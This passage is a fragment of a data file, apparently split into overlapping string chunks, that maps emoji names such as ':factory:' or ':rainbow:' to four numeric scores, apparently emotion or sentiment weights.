0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\":", "0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273], \":nail_polish:\": [0.418, 0.121, 0.314, 0.099],", "\":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326], \":neutral_face:\": [0.415, 0.309,", "[0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\": [0.042, 0.128, 0.102,", "\":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207,", "0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175,", "0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191, 0.165], \":tongue:\": [0.316, 0.062, 0.136, 0.133],", "\":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002,", "0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035,", "[0.09, 0.226, 0.113, 0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21, 0.264], \":Capricorn:\": [0.196, 0.172, 0.3,", "0.531, 0.172, 0.433], \":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002],", "0.16, 0.377, 0.2], \":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 0.278],", 
"0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002,", "0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29],", "[0.305, 0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221,", "0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131, 0.326, 0.31], \":open_file_folder:\": [0.213,", "0.297, 0.062, 0.2], \":fast_down_button:\": [0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179, 0.17600000000000002],", "[0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17,", "0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165], \":bell:\":", "\":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17,", "0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 0.079], \":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\":", "0.268, 0.127], \":dizzy:\": [0.233, 0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\":", "[0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083,", "\":sunrise_over_mountains:\": 
[0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157, 0.12,", "0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\":", "\":pizza:\": [0.142, 0.109, 0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248], \":hot_beverage:\": [0.142, 0.2,", "0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106,", "0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239], \":syringe:\": [0.21, 0.245, 0.142, 0.124],", "[0.213, 0.168, 0.152, 0.096], \":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233, 0.302, 0.22699999999999998,", "0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201, 0.295],", "[0.129, 0.327, 0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998,", "\":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997,", "[0.264, 0.376, 0.155, 0.303], \":red_apple:\": [0.251, 0.182, 0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081,", "0.18, 0.168, 0.1], \":running_shirt:\": [0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141],", "[0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127,", "0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1], 
\":running_shirt:\": [0.138, 0.081, 0.20199999999999999, 0.203],", "0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001],", "0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\": [0.053, 0.14, 0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003,", "0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079, 0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001,", "0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158, 0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22],", "0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282, 0.145], \":game_die:\":", "0.253, 0.172], \":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147, 0.228], \":banana:\":", "0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253, 0.182, 0.203], \":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\":", "[0.13, 0.15, 0.331, 0.142], \":bomb:\": [0.22, 0.196, 0.163, 0.205], \":direct_hit:\": [0.177, 0.213, 0.098,", "\":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154], \":white_flower:\": [0.187, 0.141,", "0.263, 0.276, 0.215], \":calendar:\": [0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355],", "0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998],", "0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\":", "0.22, 0.20800000000000002, 0.153], 
\":hatching_chick:\": [0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228],", "0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185, 0.317, 0.122], \":carousel_horse:\": [0.11900000000000001,", "0.07], \":page_with_curl:\": [0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126,", "0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151,", "0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\":", "0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\":", "0.193], \":link:\": [0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187,", "0.18], \":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136,", "0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131], \":Sagittarius:\": [0.17, 0.217, 0.21, 0.22],", "0.159, 0.243], \":right_arrow_curving_up:\": [0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109, 0.149, 0.11], \":incoming_envelope:\":", "0.139, 0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17, 0.256, 0.182],", "[0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128,", 
"[0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998,", "0.122, 0.158], \":boy:\": [0.171, 0.155, 0.225, 0.159], \":open_book:\": [0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\":", "0.222, 0.129, 0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292, 0.4, 0.158],", "[0.198, 0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\": [0.203, 0.243, 0.354,", "0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142], \":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142],", "0.28600000000000003, 0.201], \":carp_streamer:\": [0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247], \":mount_fuji:\":", "\":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261, 0.188], \":melon:\": [0.282, 0.313, 0.262, 0.077], \":strawberry:\": [0.153, 0.198,", "\":monkey:\": [0.179, 0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998,", "0.175], \":key:\": [0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132,", "\":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23,", "0.111, 0.153], \":speak-no-evil_monkey:\": [0.214, 0.2, 0.081, 0.147], \":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\":", "0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289,", "0.23399999999999999], \":recycling_symbol:\": 
[0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129,", "0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183,", "0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251],", "0.204, 0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165, 0.354],", "\":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\": [0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185,", "[0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222,", "0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\":", "\":neutral_face:\": [0.415, 0.309, 0.149, 0.322], \":ant:\": [0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 0.08800000000000001,", "[0.203, 0.126, 0.222, 0.289], \":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254,", "\":lollipop:\": [0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35, 0.342,", "0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23], \":volcano:\": [0.207, 0.247, 0.141, 0.22], \":department_store:\": [0.081,", "[0.266, 0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145,", "\":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111], 
\":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\": [0.395, 0.255,", "0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145], \":clapper_board:\": [0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11,", "0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\":", "\":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233,", "0.248], \":hot_beverage:\": [0.142, 0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183,", "0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18],", "0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\":", "0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\":", "[0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139,", "0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218, 0.302, 0.27399999999999997], \":black_circle:\": [0.335,", "0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304, 0.191, 0.309],", "0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 
0.18600000000000003, 0.235], \":peach:\": [0.344,", "\":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242,", "0.252, 0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153], \":speak-no-evil_monkey:\": [0.214, 0.2, 0.081, 0.147],", "0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127],", "0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22],", "[0.235, 0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13,", "[0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22, 0.179, 0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998,", "0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37], \":herb:\": [0.152, 0.282, 0.509, 0.138], \":guard:\": [0.19,", "0.29600000000000004, 0.162], \":newspaper:\": [0.222, 0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\":", "0.205], \":direct_hit:\": [0.177, 0.213, 0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259,", "0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175], \":key:\": [0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\":", "[0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485,", "0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295], 
\":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086], \":fast_up_button:\":", "\":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153], \":speak-no-evil_monkey:\": [0.214, 0.2, 0.081, 0.147], \":hot_springs:\": [0.21, 0.228,", "\":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\": [0.344, 0.204,", "0.14, 0.369], \":flushed_face:\": [0.281, 0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\":", "0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138, 0.139], \":pager:\":", "0.261], \":microphone:\": [0.121, 0.081, 0.237, 0.29], \":musical_score:\": [0.149, 0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003,", "[0.213, 0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217, 0.182, 0.171,", "0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191, 0.165],", "\":black_large_square:\": [0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\": [0.272, 0.218,", "0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22,", "[0.171, 0.263, 0.128, 0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131,", "0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139, 0.129], \":Aries:\": [0.214, 0.212, 0.284, 0.196],", "0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153], \":speak-no-evil_monkey:\": 
[0.214, 0.2, 0.081, 0.147], \":hot_springs:\":", "0.134], \":growing_heart:\": [0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215,", "0.2, 0.221, 0.24], \":ATM_sign:\": [0.128, 0.179, 0.135, 0.171], \":radio_button:\": [0.218, 0.209, 0.158, 0.261],", "0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217,", "[0.257, 0.204, 0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165,", "[0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239], \":syringe:\": [0.21, 0.245, 0.142,", "0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002, 0.125, 0.257, 0.304], \":pig_face:\": [0.179, 0.214, 0.165, 0.337],", "0.29], \":notebook:\": [0.128, 0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361, 0.212, 0.235, 0.228], \":winking_face:\": [0.098,", "[0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205, 0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998,", "\":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314, 0.355,", "0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33,", "0.337], \":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34, 0.493, 0.161, 0.27], \":green_heart:\": [0.126,", "0.263, 0.136, 0.177], \":anguished_face:\": [0.309, 0.485, 0.14, 0.369], \":flushed_face:\": [0.281, 0.263, 0.102, 0.231],", "0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203, 0.345, 
0.193], \":link:\": [0.258, 0.217, 0.179, 0.262],", "0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 0.24], \":ATM_sign:\": [0.128,", "0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\": [0.165, 0.361, 0.171, 0.282], \":jeans:\": [0.2,", "0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\":", "0.135], \":cactus:\": [0.087, 0.245, 0.192, 0.034], \":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183,", "0.149, 0.113, 0.228], \":Taurus:\": [0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245],", "0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003, 0.122],", "0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262, 0.299], \":tennis:\": [0.174,", "0.139], \":cloud:\": [0.18, 0.231, 0.266, 0.295], \":watch:\": [0.183, 0.276, 0.172, 0.235], \":church:\": [0.20800000000000002,", "0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251, 0.267, 0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\":", "0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\":", "0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\":", "0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 
0.242, 0.261, 0.188], \":melon:\": [0.282,", "[0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13, 0.18, 0.257,", "0.16699999999999998, 0.22], \":bug:\": [0.268, 0.27, 0.174, 0.102], \":blowfish:\": [0.21, 0.214, 0.155, 0.138], \":bear_face:\":", "0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 0.079], \":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276,", "[0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\": [0.099, 0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275,", "[0.142, 0.222, 0.129, 0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292, 0.4,", "[0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159,", "[0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142,", "0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\": [0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\":", "\":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196,", "[0.192, 0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255,", "0.11599999999999999, 0.138, 0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004],", "0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002], \":night_with_stars:\": [0.09, 0.174, 
